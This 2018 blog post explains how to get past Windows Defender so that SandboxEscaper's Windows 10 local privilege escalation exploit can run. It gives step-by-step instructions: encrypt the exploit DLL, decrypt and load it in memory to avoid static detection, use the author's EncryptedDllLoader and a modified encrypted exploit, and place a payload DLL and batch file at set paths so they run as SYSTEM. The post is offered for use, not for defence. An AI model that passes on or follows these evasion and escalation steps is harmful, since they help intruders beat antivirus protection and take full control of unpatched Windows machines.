Bypassing Windows Defender to run SandboxEscaper's LPE exploit

SandboxEscaper recently disclosed local privilege escalation exploit for Windows 10. It’s very reliable, should work on most versions of win10 (not updated since Sep 13th), doesn’t require any special conditions, but it is easily picked up by Windows Defender. Even if you modify it, and build it yourself, it’s still detected.

So I wanted to find a way around WD. This may sound easy for some people, but it’s not for me, since I have never battled against new WD (in win10).

After doing some research online, I found few info about how WD works. They mention AI, behaviour detection, etc… But, as it turns out later, it was all bullshit… WD doesn’t analyze memory of the process, it only does static analysis of code.

The first that came to my mind, was to somehow encode/encrypt payload dll, and then load it, decrypt and run. And that’s exactly what I did. Here are the steps that I performed:

  • encrypt exploit DLL

  • transfer it to target machine

  • load encrypted DLL file into memory

  • decrypt memory

  • load DLL from memory (DLL code gets executed)


If you don’t want to do this yourself, I create some binaries which can help. Here’s what you need to do:

  • grab EncryptedDllLoader

  • grab modified encrypted version of exploit DLL (or create your own and encrypt it yourself) (modified version of exploit is here)

  • place payload DLL at C:\Users\Public\Documents\elev.dll (this DLL will be attached to SYSTEM process)

  • place your batch file at C:\Users\Public\Documents\test.bat (this batch file will be started with SYSTEM privilege)

  • run DLL loader, choose option 4

  • Xps print job will start asking you to save a file. This should mean that all went well, and your batch file was executed. You can close this dialog, after which the DllLoader will crash.


You can use this command (inside batch file) to verify if you have elevated privilege:

whoami >> C:\Users\Public\Documents\whoami.txt

The file should contain: nt authority\system


Credits

  • SandboxEscaper for this awesome finding

  • idiots at micro$oft for making this possible

Written on November 14, 2018